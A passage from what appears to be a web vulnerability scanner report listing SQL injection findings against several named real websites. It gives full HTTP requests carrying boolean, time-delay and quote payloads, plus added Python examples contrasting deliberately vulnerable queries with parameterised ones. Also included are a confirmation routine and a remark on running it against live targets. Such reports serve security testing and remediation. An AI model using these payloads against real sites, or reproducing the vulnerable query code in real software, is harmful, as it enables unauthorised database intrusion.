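    sql = f"SELECT name FROM dealers WHERE confid = '{confid}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else ""


def dealer_name_safe(conn, confid: str) -> str:
    """Parameterised lookup: the segment can only ever be a value."""
    row = conn.execute(
        "SELECT name FROM dealers WHERE confid = ?", (confid,)
    ).fetchone()
    return row[0] if row else ""


def boolean_probe(lookup, base: str):
    """
    Two payloads that differ only in a tautology vs a contradiction.
    Returns (true_result, false_result) for the caller to compare.
    """
    return lookup(base + "' or 1=1--"), lookup(base + "' or 1=2--")


def confirm(lookup, base: str, repeats: int = 3) -> bool:
    """
    Re-send the pair and require the same difference every time; a page
    that simply varies between requests will not pass this.
    """
    first = boolean_probe(lookup, base)
    if first[0] == first[1]:
        return False
    return all(boolean_probe(lookup, base) == first for _ in range(repeats - 1))


if __name__ == "__main__":
    db = make_db()
    print(boolean_probe(lambda c: dealer_name_vulnerable(db, c), "fremonttoyota19672140"))
    print(boolean_probe(lambda c: dealer_name_safe(db, c), "fremonttoyota19672140"))
```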

Request 1

GET /carresearch/BodystylesGroup/confid_fremonttoyota19672140'%20or%201%3d1--%20/make_Toyota/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:08:29 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 05:08:30 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 33550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>New Toyota Vehicles - Sterling McCall Hyundai Houston</TITLE>
<META NAME=KEYWORDS CONTENT="New Toyota Vehicles, Toyota, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry Hybrid, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota FJ Cruiser 4x2, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander Hybrid, 2010 Toyota Highlander Hybrid, 2010 Toyota Land Cruiser, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyot
...[SNIP]...

Request 2

GET /carresearch/BodystylesGroup/confid_fremonttoyota19672140'%20or%201%3d2--%20/make_Toyota/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:08:36 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 05:08:37 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 30222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>New Toyota Vehicles - </TITLE>
<META NAME=KEYWORDS CONTENT="New Toyota Vehicles, Toyota, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry Hybrid, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota FJ Cruiser 4x2, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander Hybrid, 2010 Toyota Highlander Hybrid, 2010 Toyota Land Cruiser, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacom
...[SNIP]...

1.161. http://www.fremonttoyota.com/inventory.php [__utmc cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fremonttoyota.com
Path:   /inventory.php

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmc cookie. The application took 66165 milliseconds to respond to the request, compared with 45707 milliseconds for the original request, indicating that the injected SQL command caused a time delay. Note that the original request itself took over 45 seconds, so a 20 second increase on that baseline is weak evidence by itself; repeat the baseline measurement and try more than one delay value before treating this as confirmed.

The database appears to be Microsoft SQL Server.

Request

GET /inventory.php?&VehicleType=New HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792'waitfor%20delay'0%3a0%3a20'--; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:43:48 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 82433


<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving
...[SNIP]...

1.162. http://www.fremonttoyota.com/quick-quote.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fremonttoyota.com
Path:   /quick-quote.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 34865 milliseconds to respond to the request, compared with 394 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /quick-quote.html',0)waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 04:22:13 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 47946

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso
...[SNIP]...

1.163. http://www.fremonttoyota.com/search/CPO+t [__utmz cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fremonttoyota.com
Path:   /search/CPO+t

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmz cookie. The application took 85392 milliseconds to respond to the request, compared with 28373 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /search/CPO+t HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)',0)waitfor%20delay'0%3a0%3a20'--; PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:06:07 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 92151


<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Certified Pre-Owned Toyota Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serv
...[SNIP]...

1.164. http://www.fremonttoyota.com/search/New+Toyota+tm [__utmb cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fremonttoyota.com
Path:   /search/New+Toyota+tm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ,0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmb cookie. The application took 51229 milliseconds to respond to the request, compared with 23804 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /search/New+Toyota+tm HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792,0,0,0)waitfor%20delay'0%3a0%3a20'--; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:52:22 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 82699


<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Toyota Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - S
...[SNIP]...

1.165. http://www.legacy.com/services/obitrss.asp [Source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.legacy.com
Path:   /services/obitrss.asp

Issue detail

The Source parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the Source parameter. The application took 20353 milliseconds to respond to the request, compared with 263 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.
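A confirmation routine for the time-based findings 1.161 to 1.165, as an added example that is not code from the scanned sites or from the scanner. The baselines on this page range from 263 ms (1.165) to 45707 ms (1.161), and a single 20 second delta means very different things at those two extremes, so the routine measures a repeated baseline and requires the added time to track two different requested delays. The payload shape is the report's MSSQL waitfor delay form; the server is a constructed simulation so the check runs offline, and the acceptance rule is this example's own.

```python
"""
Confirming a time-based blind SQL injection finding (issues 1.161 to 1.165).

Added example, not the scanned sites' code. SimulatedServer is a constructed
stand-in with jittered latency; confirm_time_delay's rule (extra time must
meet each requested delay and grow with it) is this example's, not Burp's.
"""
import random
import statistics


def waitfor_payload(prefix: str, seconds: int) -> str:
    """MSSQL time-delay payload in the form used by the report."""
    return f"{prefix}'waitfor delay'0:0:{seconds}'--"


def confirm_time_delay(send, prefix: str, delays=(5, 10),
                       baseline_samples: int = 3, slack: float = 2.0) -> bool:
    """
    send(value) -> response time in seconds for a request carrying value.
    True only if each injected delay adds at least (delay - slack) seconds
    over the median baseline AND the added time grows with the requested
    delay. One slow response on an already slow page does not pass.
    """
    baseline = statistics.median(send(prefix) for _ in range(baseline_samples))
    extra = [send(waitfor_payload(prefix, d)) - baseline for d in delays]
    for d, e in zip(delays, extra):
        if e < d - slack:
            return False
    return all(later > earlier for earlier, later in zip(extra, extra[1:]))


class SimulatedServer:
    """Constructed stand-in: base latency plus jitter; sleeps if vulnerable."""

    def __init__(self, base_seconds: float, vulnerable: bool,
                 jitter: float = 0.5, seed: int = 1):
        self.base = base_seconds
        self.vulnerable = vulnerable
        self.jitter = jitter
        self.rng = random.Random(seed)

    def send(self, value: str) -> float:
        elapsed = self.base + self.rng.uniform(-self.jitter, self.jitter)
        if self.vulnerable and "waitfor delay" in value:
            # Honour the requested 0:0:NN delay exactly as a real MSSQL would.
            secs = int(value.split("0:0:")[1].split("'")[0])
            elapsed += secs
        return elapsed


if __name__ == "__main__":
    slow_vuln = SimulatedServer(45.0, vulnerable=True)    # like 1.161's baseline
    slow_clean = SimulatedServer(45.0, vulnerable=False)
    fast_vuln = SimulatedServer(0.26, vulnerable=True)    # like 1.165's baseline
    for name, srv in (("slow vulnerable", slow_vuln),
                      ("slow clean", slow_clean),
                      ("fast vulnerable", fast_vuln)):
        print(name, confirm_time_delay(srv.send, "198428792"))
```

Against a live target the send callable would issue the real request and return its elapsed time; keep the delays short enough not to trip proxy or load-balancer timeouts, and remember that every waitfor payload holds a database worker for its full duration.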

Request

GET /services/obitrss.asp?Source=MercuryNews'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: www.legacy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 06:02:57 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Content-Type: text/xml
Set-Cookie: ASPSESSIONIDCSSDBCCC=BDEJAEIDNCFFJDLHCNDJDOAD; path=/
Cache-control: private
Content-Length: 422

<?xml version="1.0" encoding="iso-8859-1"?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
<font face="Arial" size=2>
<p>Microsoft VBScript runtime </font
...[SNIP]...

1.166. http://www.linkatopia.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkatopia.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=rpqctedmaoqs1lp8qp6m2t1237; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 21
Connection: close
Content-Type: text/html

Update referer failed

Request 2

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=129vt2sagrtpoiqhi4qnliurm6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 15233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Linka
...[SNIP]...

1.167. http://www.linkatopia.com/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkatopia.com
Path:   /

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=23jlt2alhsimpjdb83thqj1bk1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 24
Connection: close
Content-Type: text/html

Update user agent failed

Request 2

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=l5hsujb84ieisgntdm6051n617; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 15233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Linka
...[SNIP]...

1.168. http://www.linkatopia.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkatopia.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ck8dha87tii3i18d86dla33dp1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 24
Connection: close
Content-Type: text/html

Update page count failed

Request 2

GET /?1''=1 HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=l2lgsa9e86pdberkmocnijggr3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 15233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Linka
...[SNIP]...

1.169. http://www.mercurynews.com/49ers/ci_16794130 [fPage cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mercurynews.com
Path:   /49ers/ci_16794130

Issue detail

The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
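The single-quote / two-single-quote test used in issues 1.166 to 1.169, as an added example that is not code from either site. The linkatopia responses above ("Update referer failed", "Update user agent failed", "Update page count failed") read like the failure branch of an UPDATE that records request headers; the visits table and the update function below are assumptions modelled on that, while the mercurynews fPage cookie is not shown reaching a query on this page. The example shows why one quote breaks the statement and two quotes (a SQL-escaped quote) repair it, and what the parameterised form does with the same inputs.

```python
"""
Error-based quote probe behind issues 1.166 to 1.169.

Added example, not the scanned sites' code. The visits table and the
header-logging UPDATE are assumptions; the error string mirrors the one
linkatopia returned.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (id INTEGER PRIMARY KEY, referer TEXT, page_count INTEGER)")
    conn.execute("INSERT INTO visits (id, referer, page_count) VALUES (1, '', 0)")
    return conn


def update_referer_vulnerable(conn, referer: str) -> str:
    """Header spliced into SQL; a syntax error surfaces as a generic message."""
    sql = f"UPDATE visits SET referer = '{referer}' WHERE id = 1"
    try:
        conn.execute(sql)
        return "ok"
    except sqlite3.Error:
        return "Update referer failed"


def update_referer_safe(conn, referer: str) -> str:
    """Bound parameter: quotes are stored as data, never parsed as SQL."""
    conn.execute("UPDATE visits SET referer = ? WHERE id = 1", (referer,))
    return "ok"


def stored_referer(conn) -> str:
    return conn.execute("SELECT referer FROM visits WHERE id = 1").fetchone()[0]


def quote_probe(update) -> dict:
    """
    The differential: ' should break the statement, '' should repair it.
    Returns {payload: outcome} so a caller can compare the two branches.
    """
    base = "http://www.google.com/search?hl=en&q="
    return {"'": update(base + "'"), "''": update(base + "''")}


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", quote_probe(lambda r: update_referer_vulnerable(db, r)),
          "stored:", stored_referer(db))
    db2 = make_db()
    print("safe:", quote_probe(lambda r: update_referer_safe(db2, r)),
          "stored:", stored_referer(db2))
```

The tell in the vulnerable case is not just the error but what the two-quote request leaves behind: a single quote stored in the column, because the database unescaped '' itself. The parameterised version stores both payloads verbatim and never errors, which is the behaviour to expect after remediation.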

Request 1

GET /49ers/ci_16794130?source=most_viewed HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false'; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
